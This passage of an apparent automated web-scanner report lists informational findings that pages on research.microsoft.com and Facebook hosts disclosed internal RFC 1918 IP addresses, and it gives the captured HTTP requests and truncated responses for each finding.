22.218. http://research.microsoft.com/en-us/projects/csec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/csec/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/projects/csec/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.219. http://research.microsoft.com/en-us/projects/nodexl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/nodexl/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/projects/nodexl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.220. http://research.microsoft.com/en-us/projects/researchgames/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/researchgames/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/projects/researchgames/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.221. http://research.microsoft.com/en-us/projects/serviceos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/serviceos/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/projects/serviceos/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.222. http://research.microsoft.com/en-us/projects/wwt/contest.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/wwt/contest.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.223. http://research.microsoft.com/en-us/projects/wwt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/wwt/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/projects/wwt/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.224. http://research.microsoft.com/en-us/research/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/research/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.225. http://research.microsoft.com/en-us/um/people/awf/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/awf/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/um/people/awf/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.226. http://research.microsoft.com/en-us/um/people/bahl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/bahl/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/um/people/bahl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.227. http://research.microsoft.com/en-us/um/people/borgs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/borgs/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/um/people/borgs/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.228. http://research.microsoft.com/en-us/um/people/jchayes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/jchayes/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/um/people/jchayes/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.229. http://research.microsoft.com/en-us/um/people/szeliski/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/szeliski/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/um/people/szeliski/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.230. http://research.microsoft.com/en-us/um/redmond/about/timeline/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/about/timeline/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/um/redmond/about/timeline/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.231. http://research.microsoft.com/feedGen/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/feedGen/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /feedGen/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.232. http://research.microsoft.com/nothing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/nothing.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /nothing.html HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.233. http://static.ak.facebook.com/connect/canvas_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.facebook.com
Path:	/connect/canvas_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /connect/canvas_proxy.php?version=3 HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 3022
Vary: Accept-Encoding
Cache-Control: public, max-age=1085
Expires: Sat, 03 Sep 2011 13:29:41 GMT
Date: Sat, 03 Sep 2011 13:11:36 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>Canvas Proxy</title>
</head>
<body onload="doFragmentSend()">
<script>
/**
* For "proxying" in-browser messages for Canvas apps.
*
* @author ptarj
...[SNIP]...

22.234. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/FGFbc80dUKj.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yL/r/FGFbc80dUKj.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/yL/r/FGFbc80dUKj.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1916
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:53:13 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Cache-Control: public, max-age=28038923
Expires: Tue, 24 Jul 2012 01:47:05 GMT
Date: Sat, 03 Sep 2011 13:11:42 GMT
Connection: close

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...

22.235. http://www.facebook.com/connect/uiserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/uiserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.74.63

Request

GET /connect/uiserver.php?social_plugin=like&method=opt.inlike&display=popup&secure=false&app_id=127760087237610&protocol=http%3A&external_page_url=http%3A%2F%2Fmicrosoftcambridge.com%2FTeams%2FMicrosoftResearch%2Ftabid%2F81%2FDefault.aspx&nux=true&referer=http%3A%2F%2Fmicrosoftcambridge.com%2FTeams%2FMicrosoftResearch%2Ftabid%2F81%2FDefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx&layout=button_count&show_faces=false&width=80&height=21
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/login.php?api_key=127760087237610&skip_api_login=1&display=popup&nux=1&referer=http%3A%2F%2Fmicrosoftcambridge.com%2FTeams%2FMicrosoftResearch%2Ftabid%2F81%2FDefault.aspx&social_plugin=like&external_page_url=http%3A%2F%2Fmicrosoftcambridge.com%2FTeams%2FMicrosoftResearch%2Ftabid%2F81%2FDefault.aspx&next=http%3A%2F%2Fwww.facebook.com%2Fconnect%2Fuiserver.php%3Fmethod%3Dopt.inlike%26app_id%3D127760087237610%26display%3Dpopup%26nux%3D1%26referer%3Dhttp%253A%252F%252Fmicrosoftcambridge.com%252FTeams%252FMicrosoftResearch%252Ftabid%252F81%252FDefault.aspx%26social_plugin%3Dlike%26secure%3Dfalse%26protocol%3Dhttp%253A%26external_page_url%3Dhttp%253A%252F%252Fmicrosoftcambridge.com%252FTeams%252FMicrosoftResearch%252Ftabid%252F81%252FDefault.aspx%26from_login%3D1&rcount=1
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.74.63
X-Cnection: close
Date: Sat, 03 Sep 2011 13:10:47 GMT
Content-Length: 0

22.236. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.55.60

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e393e914%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff1b42f2044%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1152f18f%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff1b42f2044%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb5a98d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1dd2675f%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff1b42f2044%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb5a98d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6678f94c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff1b42f2044%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb5a98d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29463397%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff1b42f2044%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb5a98d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.55.60
X-Cnection: close
Date: Sat, 03 Sep 2011 13:12:00 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f6678f94c&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff1b42f2044&relation=parent&transport=postmessage&frame=fcb5a98d", "http:\/\/ww
...[SNIP]...

22.237. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.64

Request

Response

22.238. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.38.59

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a2edf604%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff285379184%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb12f65e8%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff285379184%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3159e3658%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df108f1fe0c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff285379184%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3159e3658&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df167df3474%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff285379184%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3159e3658&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3eeb39a28%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff285379184%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3159e3658&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.59
X-Cnection: close
Date: Sat, 03 Sep 2011 13:11:41 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f167df3474&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff285379184&relation=parent&transport=postmessage&frame=f3159e3658", "http:\/\
...[SNIP]...

22.239. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.240.37

Request

GET /extern/login_status.php?api_key=c30500e97bab5d78f3fda4ea3d180840&app_id=c30500e97bab5d78f3fda4ea3d180840&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21bbe9acc%26origin%3Dhttp%253A%252F%252Ffrankgruber.me%252Ff1ce1c2e08%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1557737f8%26origin%3Dhttp%253A%252F%252Ffrankgruber.me%252Ff1ce1c2e08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355ddfa1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fbe9957%26origin%3Dhttp%253A%252F%252Ffrankgruber.me%252Ff1ce1c2e08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355ddfa1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b3d03c8c%26origin%3Dhttp%253A%252F%252Ffrankgruber.me%252Ff1ce1c2e08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355ddfa1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16f3e3618%26origin%3Dhttp%253A%252F%252Ffrankgruber.me%252Ff1ce1c2e08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df355ddfa1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.240.37
X-Cnection: close
Date: Sat, 03 Sep 2011 13:15:15 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f1b3d03c8c&origin=http\u00253A\u00252F\u00252Ffrankgruber.me\u00252Ff1ce1c2e08&relation=parent&transport=postmessage&frame=f355ddfa1c", "http:\/\
...[SNIP]...

22.240. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.85.33

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f3bc0354%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff2fc2e59dc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7c6f6cf4%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff2fc2e59dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ecf41278%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21f26ef48%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff2fc2e59dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ecf41278&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfac41a76c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff2fc2e59dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ecf41278&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d8a43564%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff2fc2e59dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ecf41278&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/sponsorships/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.85.33
X-Cnection: close
Date: Sat, 03 Sep 2011 13:11:50 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=fac41a76c&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff2fc2e59dc&relation=parent&transport=postmessage&frame=f2ecf41278", "http:\/\/
...[SNIP]...

22.241. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.230.55

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20572a27c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff28eae452c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8554a228%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff28eae452c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24b081f88%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b7974c94%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff28eae452c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24b081f88&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d6d918dc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff28eae452c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24b081f88&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26f85ad8%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff28eae452c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24b081f88&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.230.55
X-Cnection: close
Date: Sat, 03 Sep 2011 13:12:11 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f1d6d918dc&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff28eae452c&relation=parent&transport=postmessage&frame=f24b081f88", "http:\/\
...[SNIP]...

22.242. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.214.57

Request

GET /plugins/like.php?href=http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=smfbfos&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

22.243. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.70.60

Request

GET /plugins/like.php?href=http://microsoftcambridge.com/Teams/SharePointWorkspace/tabid/455/Default.aspx&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
